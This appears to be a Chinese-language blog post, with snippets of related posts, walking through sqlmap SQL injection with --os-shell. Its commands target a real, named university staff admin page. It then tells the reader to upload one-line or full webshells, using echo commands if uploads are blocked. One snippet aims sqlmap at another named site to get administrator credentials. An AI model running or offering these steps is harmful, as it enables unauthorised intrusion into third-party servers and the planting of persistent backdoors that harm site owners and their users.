利用sqlmap之 os shell拿shell

2022-05-05 20:24:06 字數 679 閱讀 6081

過程:

d:\sqlmap>sqlmap.py -u "www.eltu.cuhk.edu.hk/staff/admin.php?staffid=1" --curren

t-user

必須是root許可權

d:\sqlmap>sqlmap.py -u "www.eltu.cuhk.edu.hk/staff/admin.php?staffid=1" --os-shell

這裡根據**的實際情況來選擇指令碼語言

新增**路徑(必須的)

進入os_shell模式成功 就可以寫shell了,分2種情況

1.可以看到帶路徑的直接訪問這個路徑位址

2.如果可以新增使用者 也可以直接在下面輸入命令新增

開啟位址

上傳一句話到目錄就可以了

注:如果一句話之類的被攔截或者無法回顯,可以測試直接上傳大馬

如果大馬也失敗的話 可以利用echo命令 

利用DVWA學習sqlmap(1)

接下來我們在攻擊機器,我這裡用的是kali,首先看看靶機能否ping通,然後我們第一步需要尋找注入點,這個可以利用工具尋找,不過我為了方便直接在靶機上點sql injection然後隨便輸入乙個id 然後我們嘗試url注入能否成功 sqlmap u 發現跳轉到登入介面,需要cookies來維持會話 ...

SQL map自動注入,利用工具注入

接下來的演示都在kali內進行,kali自帶sqlmao,在kali裡面的sqlmao工具有很多引數msqlmap hh 詳細檢視,最常用的幾個 u sql注入的url位址 batch 自動化過程 以為方便 一般都會加上這個引數 p 指定引數,指定要注入的引數 這個 應該是登入的,兩個注入點,use...

kali之sqlmap應用實戰

好久沒有玩kali,都說kali玩的好,局子進的早,在各大神帖子下,今天打算用sqlmap來獲取某個悲催 的管理員賬號和密碼,www.bible history.com這個就是傳說中經常被攻擊的 今天就拿它開刀。sqlmap工具通常都是用sql自動注入來獲取 管理員密碼。輸入這個 跳轉的 介面如下 ...